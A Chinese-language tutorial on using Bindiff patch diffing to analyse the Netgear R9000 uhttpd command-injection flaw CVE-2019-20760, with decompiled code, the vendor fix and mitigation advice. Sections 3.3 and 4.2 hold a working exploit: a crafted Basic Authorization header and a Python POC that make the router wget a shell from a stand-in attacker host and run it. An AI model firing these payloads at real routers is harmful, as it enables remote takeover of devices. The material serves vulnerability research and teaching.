从补丁对比看漏洞原理：手把手教你用Bindiff分析Netgear uhttpd的RCE漏洞（CVE-2019-20760）

从补丁对比看漏洞原理：手把手教你用Bindiff分析Netgear uhttpd的RCE漏洞（CVE-2019-20760）

在二进制安全领域，补丁对比（Patch Diffing）是一种高效定位漏洞的技术手段。当厂商发布安全更新时，通过对比修复前后的二进制文件，我们可以快速锁定被修改的关键函数，进而分析漏洞成因。本文将以Netgear R9000路由器中的uhttpd服务为例，带你深入理解如何利用Bindiff工具挖掘CVE-2019-20760这个经典的远程命令执行漏洞。

1. 环境搭建与工具准备

1.1 获取目标固件

首先需要下载存在漏洞和已修复的两个版本固件：

• 漏洞版本：R9000-V1.0.4.26
• 修复版本：R9000-V1.0.4.28

wget https://www.downloads.netgear.com/files/GDC/R9000/R9000-V1.0.4.26.zip wget https://www.downloads.netgear.com/files/GDC/R9000/R9000-V1.0.4.28.zip

1.2 解压固件提取关键文件

使用binwalk解压固件获取文件系统：

binwalk -Mer R9000-V1.0.4.26.img binwalk -Mer R9000-V1.0.4.28.img

重点关注/usr/sbin/uhttpd这个二进制文件，它是漏洞分析的核心目标。

1.3 工具链配置

本次分析需要以下工具：

• IDA Pro：用于反汇编和静态分析
• Bindiff：IDA插件，专门用于二进制文件差异比较
• QEMU：ARM架构模拟环境（可选，用于动态调试）

提示：确保Bindiff插件已正确安装到IDA的plugins目录，并在分析时选择相同版本的IDA加载两个文件以保证对比准确性。

2. Bindiff基础操作与函数匹配

2.1 加载二进制文件

1. 用IDA分别打开漏洞版本和修复版本的uhttpd
2. 等待初始分析完成后，通过File > Load file > Bindiff database加载对比文件
3. Bindiff会自动匹配两个版本中的相似函数

2.2 理解匹配结果

Bindiff会显示函数相似度评分（0-1.0），重点关注：

在本次案例中，uh_cgi_auth_check函数显示相似度0.65，表明有重要修改。

3. 漏洞函数深度分析

3.1 漏洞版本代码还原

通过反编译漏洞版本的uh_cgi_auth_check，关键代码如下：

memset(s, 0, 0x1000u); v14 = strlen(v13); uh_b64decode(s, 0xFFF, v13 + 6, v14 - 6); v15 = strchr(s, ':'); if (!v15) goto LABEL_32; // 构造命令字符串 snprintf(command, 0x80u, "/usr/sbin/hash-data -e %s >/tmp/hash_result", v15 + 1); // 直接执行用户可控输入 system(command);

这段代码存在典型命令注入漏洞：

1. 对HTTP Basic Auth的Base64解码后获取用户名密码
2. 使用snprintf拼接用户输入的密码部分到系统命令
3. 直接通过system()执行拼接后的命令

3.2 修复版本对比分析

修复后的版本主要变化：

// 使用安全函数替代system dni_system("/tmp/hash_result", 0, 0, "/usr/sbin/hash-data", "-e", v17, 0);

关键改进点：

• 用dni_system替代危险的system调用
• 参数化执行而非字符串拼接
• 固定命令路径，用户输入仅作为参数传递

3.3 漏洞利用原理

攻击者可以构造特殊的Authorization头：

Authorization: Basic YWRtaW46YHdnZXQgZXhhbXBsZS5jb20vc2hlbGwuc2gKY2htb2QgK3ggLi9zaGVsbC5zaAouL3NoZWxsLnNoYA==

解码后实际命令：

admin:`wget example.com/shell.sh chmod +x ./shell.sh ./shell.sh`

当这个输入被拼接到system()调用时，反引号内的命令将被执行。

4. 漏洞复现与防御方案

4.1 本地验证环境搭建

使用QEMU模拟ARM环境：

qemu-system-arm -M vexpress-a9 \ -kernel vmlinuz-3.2.0-4-vexpress \ -initrd initrd.img-3.2.0-4-vexpress \ -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \ -append "root=/dev/mmcblk0p2 console=ttyAMA0" \ -net nic -net tap,ifname=tap0,script=no,downscript=no \ -nographic

4.2 漏洞验证POC

import requests import base64 cmd = 'admin:`wget http://attacker.com/shell.elf -O /tmp/shell && chmod +x /tmp/shell && /tmp/shell`' auth = 'Basic ' + base64.b64encode(cmd.encode()).decode() requests.get("http://target/cgi-bin/", headers={"Authorization": auth})

4.3 安全防护建议

对于开发者：

• 避免使用system/popen等危险函数
• 使用execve等参数化执行方式
• 对用户输入进行严格过滤

对于管理员：

• 及时更新设备固件
• 限制管理界面访问来源
• 监控异常网络请求

5. 进阶分析技巧

5.1 函数调用图对比

使用Bindiff的调用图(Call Graph)功能，可以可视化函数关系变化：

1. 右键函数选择"View flow graph"
2. 对比两个版本的调用关系
3. 重点关注新增/删除的安全检查函数

5.2 交叉引用分析

在IDA中通过Xrefs查找system等危险函数的调用点：

for addr in idautils.Functions(): if "system" in GetFunctionName(addr): print(hex(addr), GetFunctionName(addr))

5.3 补丁星期二分析策略

针对厂商定期更新的安全补丁，建议：

1. 建立自动化抓取固件更新的流程
2. 对每个版本进行Bindiff快速筛查
3. 优先分析网络服务组件
4. 记录历史漏洞模式形成知识库

在真实漏洞挖掘过程中，补丁对比往往能发现"漏洞的同源变异"。比如这次分析的命令注入问题，在多个厂商的路由器固件中都存在类似模式。掌握Bindiff这类工具的使用，能显著提高二进制分析的效率。